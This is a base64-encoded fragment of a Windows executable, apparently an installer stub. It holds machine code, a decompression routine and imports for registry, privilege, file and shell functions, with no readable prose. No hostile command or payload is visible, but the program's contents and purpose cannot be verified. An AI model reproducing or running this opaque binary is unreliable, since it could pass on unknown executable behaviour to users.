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9uAABTSEVMTDMyLmRsbABlAENvVGFza01lbUZyZWUAxgBJSURGcm9tU3RyaW5nABAAQ29DcmVhdGVJbnN0YW5jZQAABQFPbGVVbmluaXRpYWxpemUA7gBPbGVJbml0aWFsaXplAG9sZTMyLmRsbAA4AEltYWdlTGlzdF9EZXN0cm95ADQASW1hZ2VMaXN0X0FkZE1hc2tlZAA3AEltYWdlTGlzdF9DcmVhdGUAAENPTUNUTDMyLmRsbAAAyABFbmRQYWludAAAvwBEcmF3VGV4dFcA4gBGaWxsUmVjdAAA/wBHZXRDbGllbnRSZWN0AA0AQmVnaW5QYWludAAAjwBEZWZXaW5kb3dQcm9jVwAAQAJTZW5kTWVzc2FnZVcAAJMBSW52YWxpZGF0ZVJlY3QAAMQARW5hYmxlV2luZG93AAAqAlJlbGVhc2VEQwAMAUdldERDAMEBTG9hZEltYWdlVwAAgQJTZXRXaW5kb3dMb25nVwAAEQFHZXREbGdJdGVtAACtAUlzV2luZG93AADlAEZpbmRXaW5kb3dFeFcAPwJTZW5kTWVzc2FnZVRpbWVvdXRXANgCd3NwcmludGZXAJICU2hvd1dpbmRvdwAAVwJTZXRGb3JlZ3JvdW5kV2luZG93AAQCUG9zdFF1aXRNZXNzYWdlAIcCU2V0V2luZG93VGV4dFcAAHoCU2V0VGltZXIAAFYAQ3JlYXRlRGlhbG9nUGFyYW1XAACZAERlc3Ryb3lXaW5kb3cA4QBFeGl0V2luZG93c0V4ACwAQ2hhck5leHRXAJ8ARGlhbG9nQm94UGFyYW1XAPkAR2V0Q2xhc3NJbmZvVwBhAENyZWF0ZVdpbmRvd0V4VwCaAlN5c3RlbVBhcmFtZXRlcnNJbmZvVwAZAlJlZ2lzdGVyQ2xhc3NXAADGAEVuZERpYWxvZwAxAlNjcmVlblRvQ2xpZW50AAB0AUdldFdpbmRvd1JlY3QAwgBFbmFibGVNZW51SXRlbQAAXAFHZXRTeXN0ZW1NZW51AEgCU2V0Q2xhc3NMb25nVwCuAUlzV2luZG93RW5hYmxlZABvAUdldFdpbmRvd0xvbmdXAACDAlNldFdpbmRvd1BvcwAAWgFHZXRTeXNDb2xvcgBNAlNldEN1cnNvcgC9AUxvYWRDdXJzb3JXADgAQ2hlY2tEbGdCdXR0b24AADwBR2V0TWVzc2FnZVBvcwAcAENhbGxXaW5kb3dQcm9jVwCxAUlzV2luZG93VmlzaWJsZQBCAENsb3NlQ2xpcGJvYXJkAABKAlNldENsaXBib2FyZERhdGEAAMEARW1wdHlDbGlwYm9hcmQAAPYBT3BlbkNsaXBib2FyZACkAlRyYWNrUG9wdXBNZW51AAAJAEFwcGVuZE1lbnVXAF4AQ3JlYXRlUG9wdXBNZW51AF0BR2V0U3lzdGVtTWV0cmljcwAAVAJTZXREbGdJdGVtVGV4dFcAFAFHZXREbGdJdGVtVGV4dFcA4wFNZXNzYWdlQm94SW5kaXJlY3RXAC8AQ2hhclByZXZXACoAQ2hhck5leHRBANcCd3NwcmludGZBAKIARGlzcGF0Y2hNZXNzYWdlVwAAAQJQZWVrTWVzc2FnZVcAAFVTRVIzMi5kbGwAAA4CU2VsZWN0T2JqZWN0AAA8AlNldFRleHRDb2xvcgAAFgJTZXRCa01vZGUAPQBDcmVhdGVGb250SW5kaXJlY3RXACkAQ3JlYXRlQnJ1c2hJbmRpcmVjdACPAERlbGV0ZU9iamVjdAAAawFHZXREZXZpY2VDYXBzABUCU2V0QmtDb2xvcgAAR0RJMzIuZGxsAHQCTXVsRGl2AACEAERlbGV0ZUZpbGVXANUARmluZEZpcnN0RmlsZVcAAN0ARmluZE5leHRGaWxlVwDOAEZpbmRDbG9zZQAbA1NldEZpbGVQb2ludGVyAAC1AlJlYWRGaWxlAAB1Ak11bHRpQnl0ZVRvV2lkZUNoYXIAzANsc3RybGVuQQAAnQFHZXRQcml2YXRlUHJvZmlsZVN0cmluZ1cAAKoDV3JpdGVQcml2YXRlUHJvZmlsZVN0cmluZ1cAAPgARnJlZUxpYnJhcnkAVAJMb2FkTGlicmFyeUV4VwAAggFHZXRNb2R1bGVIYW5kbGVXAAD4AUdsb2JhbEFsbG9jAP8BR2xvYmFsRnJlZQAAvQBFeHBhbmRFbnZpcm9ubWVudFN0cmluZ3NXAMEDbHN0cmNtcFcAAMQDbHN0cmNtcGlXADQAQ2xvc2VIYW5kbGUAHwNTZXRGaWxlVGltZQA5AENvbXBhcmVGaWxlVGltZQDcAlNlYXJjaFBhdGhXALYBR2V0U2hvcnRQYXRoTmFtZVcAagFHZXRGdWxsUGF0aE5hbWVXAABxAk1vdmVGaWxlVwALA1NldEN1cnJlbnREaXJlY3RvcnlXAABhAUdldEZpbGVBdHRyaWJ1dGVzVwAAGgNTZXRGaWxlQXR0cmlidXRlc1cAAFYDU2xlZXAA3wFHZXRUaWNrQ291bnQAAFYAQ3JlYXRlRmlsZVcAYwFHZXRGaWxlU2l6ZQB+AUdldE1vZHVsZUZpbGVOYW1lVwAAQgFHZXRDdXJyZW50UHJvY2VzcwC5AEV4aXRQcm9jZXNzAEYAQ29weUZpbGVXABQDU2V0RW52aXJvbm1lbnRWYXJpYWJsZVcA9AFHZXRXaW5kb3dzRGlyZWN0b3J5VwAA1gFHZXRUZW1wUGF0aFcAABEBR2V0Q2